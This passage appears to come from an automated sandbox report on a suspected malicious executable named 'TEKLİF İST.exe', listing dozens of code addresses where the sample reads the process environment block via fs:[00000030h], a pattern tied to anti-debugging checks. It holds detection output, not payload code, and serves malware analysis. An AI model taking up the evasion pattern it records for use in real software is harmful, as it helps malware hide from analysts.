          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7674D mov eax, dword ptr fs:[00000030h]4_2_01B7674D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7674D mov eax, dword ptr fs:[00000030h]4_2_01B7674D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B766B0 mov eax, dword ptr fs:[00000030h]4_2_01B766B0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7C6A6 mov eax, dword ptr fs:[00000030h]4_2_01B7C6A6
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B44690 mov eax, dword ptr fs:[00000030h]4_2_01B44690
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B44690 mov eax, dword ptr fs:[00000030h]4_2_01B44690
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBE6F2 mov eax, dword ptr fs:[00000030h]4_2_01BBE6F2
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBE6F2 mov eax, dword ptr fs:[00000030h]4_2_01BBE6F2
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBE6F2 mov eax, dword ptr fs:[00000030h]4_2_01BBE6F2
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBE6F2 mov eax, dword ptr fs:[00000030h]4_2_01BBE6F2
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC06F1 mov eax, dword ptr fs:[00000030h]4_2_01BC06F1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC06F1 mov eax, dword ptr fs:[00000030h]4_2_01BC06F1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A6C7 mov ebx, dword ptr fs:[00000030h]4_2_01B7A6C7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A6C7 mov eax, dword ptr fs:[00000030h]4_2_01B7A6C7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5E627 mov eax, dword ptr fs:[00000030h]4_2_01B5E627
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B76620 mov eax, dword ptr fs:[00000030h]4_2_01B76620
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B78620 mov eax, dword ptr fs:[00000030h]4_2_01B78620
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4262C mov eax, dword ptr fs:[00000030h]4_2_01B4262C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B82619 mov eax, dword ptr fs:[00000030h]4_2_01B82619
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0866E mov eax, dword ptr fs:[00000030h]4_2_01C0866E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0866E mov eax, dword ptr fs:[00000030h]4_2_01C0866E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBE609 mov eax, dword ptr fs:[00000030h]4_2_01BBE609
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5260B mov eax, dword ptr fs:[00000030h]4_2_01B5260B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5260B mov eax, dword ptr fs:[00000030h]4_2_01B5260B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5260B mov eax, dword ptr fs:[00000030h]4_2_01B5260B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5260B mov eax, dword ptr fs:[00000030h]4_2_01B5260B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5260B mov eax, dword ptr fs:[00000030h]4_2_01B5260B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5260B mov eax, dword ptr fs:[00000030h]4_2_01B5260B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5260B mov eax, dword ptr fs:[00000030h]4_2_01B5260B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B72674 mov eax, dword ptr fs:[00000030h]4_2_01B72674
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A660 mov eax, dword ptr fs:[00000030h]4_2_01B7A660
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A660 mov eax, dword ptr fs:[00000030h]4_2_01B7A660
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5C640 mov eax, dword ptr fs:[00000030h]4_2_01B5C640
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC89B3 mov esi, dword ptr fs:[00000030h]4_2_01BC89B3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC89B3 mov eax, dword ptr fs:[00000030h]4_2_01BC89B3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC89B3 mov eax, dword ptr fs:[00000030h]4_2_01BC89B3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0A9D3 mov eax, dword ptr fs:[00000030h]4_2_01C0A9D3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B529A0 mov eax, dword ptr fs:[00000030h]4_2_01B529A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B529A0 mov eax, dword ptr fs:[00000030h]4_2_01B529A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B529A0 mov eax, dword ptr fs:[00000030h]4_2_01B529A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B529A0 mov eax, dword ptr fs:[00000030h]4_2_01B529A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B529A0 mov eax, dword ptr fs:[00000030h]4_2_01B529A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B529A0 mov eax, dword ptr fs:[00000030h]4_2_01B529A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B529A0 mov eax, dword ptr fs:[00000030h]4_2_01B529A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B529A0 mov eax, dword ptr fs:[00000030h]4_2_01B529A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B529A0 mov eax, dword ptr fs:[00000030h]4_2_01B529A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B529A0 mov eax, dword ptr fs:[00000030h]4_2_01B529A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B529A0 mov eax, dword ptr fs:[00000030h]4_2_01B529A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B529A0 mov eax, dword ptr fs:[00000030h]4_2_01B529A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B529A0 mov eax, dword ptr fs:[00000030h]4_2_01B529A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B409AD mov eax, dword ptr fs:[00000030h]4_2_01B409AD
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B409AD mov eax, dword ptr fs:[00000030h]4_2_01B409AD
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B729F9 mov eax, dword ptr fs:[00000030h]4_2_01B729F9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B729F9 mov eax, dword ptr fs:[00000030h]4_2_01B729F9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCE9E0 mov eax, dword ptr fs:[00000030h]4_2_01BCE9E0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A9D0 mov eax, dword ptr fs:[00000030h]4_2_01B4A9D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A9D0 mov eax, dword ptr fs:[00000030h]4_2_01B4A9D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A9D0 mov eax, dword ptr fs:[00000030h]4_2_01B4A9D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A9D0 mov eax, dword ptr fs:[00000030h]4_2_01B4A9D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A9D0 mov eax, dword ptr fs:[00000030h]4_2_01B4A9D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A9D0 mov eax, dword ptr fs:[00000030h]4_2_01B4A9D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B749D0 mov eax, dword ptr fs:[00000030h]4_2_01B749D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD69C0 mov eax, dword ptr fs:[00000030h]4_2_01BD69C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC892A mov eax, dword ptr fs:[00000030h]4_2_01BC892A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD892B mov eax, dword ptr fs:[00000030h]4_2_01BD892B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B38918 mov eax, dword ptr fs:[00000030h]4_2_01B38918
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B38918 mov eax, dword ptr fs:[00000030h]4_2_01B38918
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCC912 mov eax, dword ptr fs:[00000030h]4_2_01BCC912
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBE908 mov eax, dword ptr fs:[00000030h]4_2_01BBE908
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBE908 mov eax, dword ptr fs:[00000030h]4_2_01BBE908
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCC97C mov eax, dword ptr fs:[00000030h]4_2_01BCC97C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE4978 mov eax, dword ptr fs:[00000030h]4_2_01BE4978
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE4978 mov eax, dword ptr fs:[00000030h]4_2_01BE4978
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B66962 mov eax, dword ptr fs:[00000030h]4_2_01B66962
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B66962 mov eax, dword ptr fs:[00000030h]4_2_01B66962
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B66962 mov eax, dword ptr fs:[00000030h]4_2_01B66962
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B8096E mov eax, dword ptr fs:[00000030h]4_2_01B8096E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B8096E mov edx, dword ptr fs:[00000030h]4_2_01B8096E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B8096E mov eax, dword ptr fs:[00000030h]4_2_01B8096E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC0946 mov eax, dword ptr fs:[00000030h]4_2_01BC0946
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCC89D mov eax, dword ptr fs:[00000030h]4_2_01BCC89D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0A8E4 mov eax, dword ptr fs:[00000030h]4_2_01C0A8E4
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B40887 mov eax, dword ptr fs:[00000030h]4_2_01B40887
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7C8F9 mov eax, dword ptr fs:[00000030h]4_2_01B7C8F9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7C8F9 mov eax, dword ptr fs:[00000030h]4_2_01B7C8F9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E8C0 mov eax, dword ptr fs:[00000030h]4_2_01B6E8C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B62835 mov eax, dword ptr fs:[00000030h]4_2_01B62835
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B62835 mov eax, dword ptr fs:[00000030h]4_2_01B62835
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B62835 mov eax, dword ptr fs:[00000030h]4_2_01B62835
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B62835 mov ecx, dword ptr fs:[00000030h]4_2_01B62835
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B62835 mov eax, dword ptr fs:[00000030h]4_2_01B62835
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B62835 mov eax, dword ptr fs:[00000030h]4_2_01B62835
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE483A mov eax, dword ptr fs:[00000030h]4_2_01BE483A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE483A mov eax, dword ptr fs:[00000030h]4_2_01BE483A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A830 mov eax, dword ptr fs:[00000030h]4_2_01B7A830
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCC810 mov eax, dword ptr fs:[00000030h]4_2_01BCC810
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD6870 mov eax, dword ptr fs:[00000030h]4_2_01BD6870
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD6870 mov eax, dword ptr fs:[00000030h]4_2_01BD6870
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCE872 mov eax, dword ptr fs:[00000030h]4_2_01BCE872
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCE872 mov eax, dword ptr fs:[00000030h]4_2_01BCE872
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B70854 mov eax, dword ptr fs:[00000030h]4_2_01B70854
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B44859 mov eax, dword ptr fs:[00000030h]4_2_01B44859
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B44859 mov eax, dword ptr fs:[00000030h]4_2_01B44859
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B52840 mov ecx, dword ptr fs:[00000030h]4_2_01B52840
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50BBE mov eax, dword ptr fs:[00000030h]4_2_01B50BBE
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50BBE mov eax, dword ptr fs:[00000030h]4_2_01B50BBE
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF4BB0 mov eax, dword ptr fs:[00000030h]4_2_01BF4BB0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF4BB0 mov eax, dword ptr fs:[00000030h]4_2_01BF4BB0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B48BF0 mov eax, dword ptr fs:[00000030h]4_2_01B48BF0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B48BF0 mov eax, dword ptr fs:[00000030h]4_2_01B48BF0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B48BF0 mov eax, dword ptr fs:[00000030h]4_2_01B48BF0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6EBFC mov eax, dword ptr fs:[00000030h]4_2_01B6EBFC
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCCBF0 mov eax, dword ptr fs:[00000030h]4_2_01BCCBF0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEEBD0 mov eax, dword ptr fs:[00000030h]4_2_01BEEBD0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B40BCD mov eax, dword ptr fs:[00000030h]4_2_01B40BCD
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B40BCD mov eax, dword ptr fs:[00000030h]4_2_01B40BCD
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B40BCD mov eax, dword ptr fs:[00000030h]4_2_01B40BCD
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B60BCB mov eax, dword ptr fs:[00000030h]4_2_01B60BCB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B60BCB mov eax, dword ptr fs:[00000030h]4_2_01B60BCB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B60BCB mov eax, dword ptr fs:[00000030h]4_2_01B60BCB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0AB40 mov eax, dword ptr fs:[00000030h]4_2_01C0AB40
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6EB20 mov eax, dword ptr fs:[00000030h]4_2_01B6EB20
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6EB20 mov eax, dword ptr fs:[00000030h]4_2_01B6EB20
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBEB1D mov eax, dword ptr fs:[00000030h]4_2_01BBEB1D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBEB1D mov eax, dword ptr fs:[00000030h]4_2_01BBEB1D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBEB1D mov eax, dword ptr fs:[00000030h]4_2_01BBEB1D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBEB1D mov eax, dword ptr fs:[00000030h]4_2_01BBEB1D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBEB1D mov eax, dword ptr fs:[00000030h]4_2_01BBEB1D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBEB1D mov eax, dword ptr fs:[00000030h]4_2_01BBEB1D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBEB1D mov eax, dword ptr fs:[00000030h]4_2_01BBEB1D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBEB1D mov eax, dword ptr fs:[00000030h]4_2_01BBEB1D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBEB1D mov eax, dword ptr fs:[00000030h]4_2_01BBEB1D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3CB7E mov eax, dword ptr fs:[00000030h]4_2_01B3CB7E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C08B28 mov eax, dword ptr fs:[00000030h]4_2_01C08B28
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C08B28 mov eax, dword ptr fs:[00000030h]4_2_01C08B28
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEEB50 mov eax, dword ptr fs:[00000030h]4_2_01BEEB50
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF4B4B mov eax, dword ptr fs:[00000030h]4_2_01BF4B4B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF4B4B mov eax, dword ptr fs:[00000030h]4_2_01BF4B4B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE8B42 mov eax, dword ptr fs:[00000030h]4_2_01BE8B42
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD6B40 mov eax, dword ptr fs:[00000030h]4_2_01BD6B40
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD6B40 mov eax, dword ptr fs:[00000030h]4_2_01BD6B40
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B48AA0 mov eax, dword ptr fs:[00000030h]4_2_01B48AA0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B48AA0 mov eax, dword ptr fs:[00000030h]4_2_01B48AA0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B96AA4 mov eax, dword ptr fs:[00000030h]4_2_01B96AA4
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B78A90 mov edx, dword ptr fs:[00000030h]4_2_01B78A90
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4EA80 mov eax, dword ptr fs:[00000030h]4_2_01B4EA80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4EA80 mov eax, dword ptr fs:[00000030h]4_2_01B4EA80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4EA80 mov eax, dword ptr fs:[00000030h]4_2_01B4EA80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4EA80 mov eax, dword ptr fs:[00000030h]4_2_01B4EA80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4EA80 mov eax, dword ptr fs:[00000030h]4_2_01B4EA80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4EA80 mov eax, dword ptr fs:[00000030h]4_2_01B4EA80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4EA80 mov eax, dword ptr fs:[00000030h]4_2_01B4EA80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4EA80 mov eax, dword ptr fs:[00000030h]4_2_01B4EA80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4EA80 mov eax, dword ptr fs:[00000030h]4_2_01B4EA80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14A80 mov eax, dword ptr fs:[00000030h]4_2_01C14A80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7AAEE mov eax, dword ptr fs:[00000030h]4_2_01B7AAEE
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7AAEE mov eax, dword ptr fs:[00000030h]4_2_01B7AAEE
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B40AD0 mov eax, dword ptr fs:[00000030h]4_2_01B40AD0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B74AD0 mov eax, dword ptr fs:[00000030h]4_2_01B74AD0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B74AD0 mov eax, dword ptr fs:[00000030h]4_2_01B74AD0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B96ACC mov eax, dword ptr fs:[00000030h]4_2_01B96ACC
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B96ACC mov eax, dword ptr fs:[00000030h]4_2_01B96ACC
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B96ACC mov eax, dword ptr fs:[00000030h]4_2_01B96ACC
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B64A35 mov eax, dword ptr fs:[00000030h]4_2_01B64A35
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B64A35 mov eax, dword ptr fs:[00000030h]4_2_01B64A35
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7CA38 mov eax, dword ptr fs:[00000030h]4_2_01B7CA38
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7CA24 mov eax, dword ptr fs:[00000030h]4_2_01B7CA24
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6EA2E mov eax, dword ptr fs:[00000030h]4_2_01B6EA2E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCCA11 mov eax, dword ptr fs:[00000030h]4_2_01BCCA11
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBCA72 mov eax, dword ptr fs:[00000030h]4_2_01BBCA72
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBCA72 mov eax, dword ptr fs:[00000030h]4_2_01BBCA72
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7CA6F mov eax, dword ptr fs:[00000030h]4_2_01B7CA6F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7CA6F mov eax, dword ptr fs:[00000030h]4_2_01B7CA6F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7CA6F mov eax, dword ptr fs:[00000030h]4_2_01B7CA6F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEEA60 mov eax, dword ptr fs:[00000030h]4_2_01BEEA60
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B46A50 mov eax, dword ptr fs:[00000030h]4_2_01B46A50
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B46A50 mov eax, dword ptr fs:[00000030h]4_2_01B46A50
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B46A50 mov eax, dword ptr fs:[00000030h]4_2_01B46A50
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B46A50 mov eax, dword ptr fs:[00000030h]4_2_01B46A50
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B46A50 mov eax, dword ptr fs:[00000030h]4_2_01B46A50
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B46A50 mov eax, dword ptr fs:[00000030h]4_2_01B46A50
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B46A50 mov eax, dword ptr fs:[00000030h]4_2_01B46A50
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50A5B mov eax, dword ptr fs:[00000030h]4_2_01B50A5B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50A5B mov eax, dword ptr fs:[00000030h]4_2_01B50A5B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7CDB1 mov ecx, dword ptr fs:[00000030h]4_2_01B7CDB1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7CDB1 mov eax, dword ptr fs:[00000030h]4_2_01B7CDB1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7CDB1 mov eax, dword ptr fs:[00000030h]4_2_01B7CDB1
